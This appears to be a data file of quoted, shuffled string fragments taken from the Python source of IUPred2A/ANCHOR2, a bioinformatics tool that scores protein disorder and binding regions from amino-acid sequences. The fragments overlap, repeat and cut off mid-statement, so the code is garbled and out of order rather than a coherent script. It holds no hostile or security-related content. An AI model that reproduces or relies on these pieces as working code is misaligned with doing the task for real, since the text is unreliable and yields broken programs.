"sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH =",
"= gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk",
"_seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for",
"h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return",
"smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign",
"1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max,",
"< 45: beg = gr[k][0] end = gr[kk][1] kk += 1 elif end",
"for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError:",
"{} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str",
"= 0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx",
"= gr[0][0] end = gr[0][1] nr = len(gr) while k < nr: if",
"as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min:",
"* len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for",
"_freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items():",
"(1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH =",
"hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for",
"seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:] res =",
"# Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1]))",
"state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337.",
"weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx",
"< nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr =",
"\"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d",
"histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1",
"try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode",
"if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in",
"= {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min",
"idx - 1)] + seq[idx + 2:idx + local_window_size + 1]) for aa,",
"if mode == 'short': for idx in range(len(seq)): for idx2 in range(idx -",
"for i in range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr))",
"(par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn:",
"+= -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx +",
"len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in",
"corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr =",
"= 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc",
"'-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence):",
"in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx",
"types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory (default='./')",
"lc)] + seq[idx + lc + 1:idx + uc + 1]) for aa,",
"# Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1])",
"par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] -",
"and gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1] kk",
"0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain,",
"open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]]",
"= idx in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr =",
"not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH):",
"= read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc = 100 wc",
"end = gr[k][1] seq = seq.lower() nr = 0 res = \"\" for",
"histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score =",
"file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq",
"gr[k][1] seq = seq.lower() nr = 0 res = \"\" for i in",
"print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1,",
"if kk < nr and gr[kk][0] - end < 45: beg = gr[k][0]",
"\\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a",
"for idx2 in range(idx - wc, idx + wc + 1): if idx2",
"sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print",
"= 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return",
"{} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis",
"- 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min)",
"Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq =",
"# Add SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2],",
"0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end += 1",
"energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx]",
"float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist",
"else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr",
"_freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with",
"= (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list,",
"wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score",
"== 'glob': gr = [] in_gr = False beg, end = 0, 0",
"of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular",
"iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit",
"local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0]",
"= gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk += 1",
"of redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids",
"histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx]",
"(energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 /",
"found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH,",
"idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window +",
"- window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq =",
"* (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968",
"in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory",
"= {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2])",
"h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line",
"beg, 1: end}) mgr = [] k = 0 kk = k +",
"h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh: if",
"not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv:",
"_freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq)",
"if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"#",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc",
"print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv: print(\"\\t{:.4f}\".format(anchor2_res[pos]), end=\"\") print()",
"[] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for",
"len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0,",
"weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr =",
"if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min)",
"+ wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if",
"range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx +",
">= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx -",
"1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score",
"if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence,",
"[0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0,",
"read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]]",
"+ 10] for i in range(0, len(res), 10)]) glob_text += \"Number of globular",
"= os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\",",
"+= \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1)",
"except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)):",
"histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] -",
"anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in",
"sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence,",
"kk += 1 if k < nr: beg = gr[k][0] end = gr[k][1]",
"seq.lower() nr = 0 res = \"\" for i in mgr: res +=",
"wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif",
"idx + wc + 1): if idx2 < 0 or idx2 >= len(seq):",
"\\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory",
"end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val",
"< 35: k += 1 if k < nr: beg = gr[k][0] end",
"help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of",
"in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if",
"kk kk += 1 if k < nr: beg = gr[k][0] end =",
"{}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction",
"end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk +=",
"1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob':",
"\" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text",
"10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr):",
"1 elif end - beg + 1 < 35: k += 1 if",
"in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1,",
"os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\",",
"_line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] =",
"= [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx -",
"2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 *",
"h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score =",
"[0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq)",
"not in_gr: beg = idx end = idx in_gr = True if in_gr:",
"sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"#",
"iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\")",
"_line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc = 1",
"return _seq def iupred(seq, mode): if mode == \"short\": lc = 1 uc",
"_fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] *",
"if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode",
"== 'glob': lc = 1 uc = 100 wc = 15 mtx =",
"in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k",
"[0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list),",
"iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A:",
"iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c",
"read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10 mtx =",
"analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual",
"freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx",
"else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a'",
"1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except",
"'-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res",
"in_gr = False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score):",
"KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa]",
"POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if",
"1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except",
"mode == 'glob': gr = [] in_gr = False beg, end = 0,",
"textwrap import math import os from Bio import SeqIO def avg(lst): return sum(lst)",
"1 if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while",
"iupred(seq, mode): if mode == \"short\": lc = 1 uc = 25 wc",
"val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] =",
"* len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx",
"sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in",
"= False elif in_gr: end += 1 if val > 0.3 and not",
"_mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx",
"= [0] * len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)):",
"= [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh:",
"in_gr: end += 1 if val > 0.3 and not in_gr: beg =",
"message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a",
"read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm:",
"gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res = \"\"",
"par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c -",
"freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores =",
"1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins",
"in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {}",
"len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc,",
"+ 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2",
"['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with",
"* (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {}",
"0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a /",
"i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1]",
"_seq += _line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc",
"interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx]",
"sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long',",
"- par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx]",
"idx in range(len(seq)): for idx2 in range(idx - wc, idx + wc +",
"or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /=",
"= 0 res = \"\" for i in mgr: res += seq[nr:i[0]] +",
"1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else:",
"< 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2],",
"not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong",
"gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1] kk +=",
"sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if",
"def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in",
"<= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end +=",
"2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] +=",
"seq[idx + lc + 1:idx + uc + 1]) for aa, freq in",
"+ 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq",
"# Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein",
"binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction",
"nr = len(gr) while k < nr: if kk < nr and gr[kk][0]",
"protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # #",
"sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\")",
"sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if",
"(options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str -",
"read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc =",
"< 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2]",
"(par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] +",
"if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa,",
"'short': for idx in range(len(seq)): for idx2 in range(idx - wc, idx +",
"1 if k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0:",
"glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5",
"disorder as a function of redox state and protein binding # <NAME>, <NAME>,",
"multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: #",
"in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr",
"with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx:",
"len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for idx",
"= \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options",
"fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min",
"k = 0 kk = k + 1 if gr: beg = gr[0][0]",
"+ 1 < 35: k += 1 if k < nr: beg =",
"1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else:",
"- end < 45: beg = gr[k][0] end = gr[kk][1] kk += 1",
"'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos,",
"as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return",
"= 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <=",
"POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue,",
"and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. #",
"mgr.append({0: beg, 1: end}) k = kk kk += 1 if k <",
"pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in",
"for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def",
"100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH))",
"SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for",
"+ seq[idx + lc + 1:idx + uc + 1]) for aa, freq",
"\\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a -",
"idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1:",
"at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg))",
"= [] k = 0 kk = k + 1 if gr: beg",
"len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm:",
"- uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc",
"k = kk kk += 1 if k < nr: beg = gr[k][0]",
"= float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max",
"def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in _freq:",
"wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else:",
"< 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] =",
"1 if k < nr: beg = gr[k][0] end = gr[k][1] seq =",
"if val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val",
"== \"short\": lc = 1 uc = 25 wc = 10 mtx =",
"1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <=",
"not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output",
"weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1))",
"{}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not",
"= histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq,",
"nr and gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1]",
"{} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score",
"1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score):",
"(iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 *",
"found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2",
"interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain",
"par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx]",
"sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory",
"idx in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr = []",
"sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos +",
"for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]]",
"gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end += 1 if",
"5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c",
"not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not",
"of protein disorder as a function of redox state and protein binding #",
"range(idx - wc, idx + wc + 1): if idx2 < 0 or",
"i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] +",
"return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window",
"1: end}) k = kk kk += 1 if k < nr: beg",
"local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign = 1",
"weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in",
"- wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text",
"try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] =",
"= 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1",
"parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function of redox",
"posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1]",
"beg = idx end = idx in_gr = True if in_gr: gr.append({0: beg,",
"< nr: if kk < nr and gr[kk][0] - end < 45: beg",
"unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)): for idx2",
"glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] +",
"aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx]",
